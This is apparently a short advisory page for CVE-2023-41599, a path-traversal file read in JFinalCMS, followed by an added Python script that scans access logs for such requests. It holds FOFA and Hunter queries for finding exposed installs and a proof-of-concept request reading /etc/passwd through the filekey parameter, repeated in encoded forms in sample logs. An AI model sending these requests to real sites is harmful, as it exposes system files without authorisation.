2023-09-20 17:48:03 +08:00
## JFinalCMS Arbitrary File Read Vulnerability (CVE-2023-41599)
## Fingerprint
```
fofa:
body="content=\"JreCms"

hunter:
web.body="content=\"JreCms"
```
## POC
```
Windows: /../../../../../../../../../test.txt
Linux: /../../../../../../../../../etc/passwd

/command/down/file?filekey=/../../../../../../../../../etc/passwd
```
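For defenders, the request shape above can be searched for in web access logs. The following is an added example, not part of the original page or the JFinalCMS project; it also covers percent-encoded and backslash variants of the same pattern. The log lines are constructed samples and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

ENDPOINT = "/command/down/file"  # download path shown in the PoC
PARAM = "filekey"                # parameter shown in the PoC

# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Sep/2023:17:50:01 +0800] "GET /command/down/file?filekey=/../../../../../../../../../etc/passwd HTTP/1.1" 200 1024
203.0.113.7 - - [20/Sep/2023:17:50:02 +0800] "GET /command/down/file?filekey=%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024
203.0.113.9 - - [20/Sep/2023:17:50:03 +0800] "GET /command/down/file?filekey=..%255C..%255Ctest.txt HTTP/1.1" 404 0
198.51.100.20 - - [20/Sep/2023:17:51:10 +0800] "GET /command/down/file?filekey=upload/report..final.pdf HTTP/1.1" 200 5120
198.51.100.20 - - [20/Sep/2023:17:51:11 +0800] "GET /index?filekey=../x HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e%252e), at most `rounds` passes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(filekey):
    """True if the decoded value has a '..' path segment (either slash style)."""
    return ".." in re.split(r"[\\/]+", decode_fully(filekey))

def find_traversal_requests(log_text):
    """Return (client_ip, decoded_filekey) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # endswith() tolerates deployment under a servlet context path
        if not url.path.rstrip("/").endswith(ENDPOINT):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == PARAM and is_traversal(value):
                hits.append((line.split()[0], decode_fully(value)))
    return hits
```

Matching on whole `..` path segments rather than the substring keeps file names such as `report..final.pdf` from being flagged.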
## Vulnerability Analysis
http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/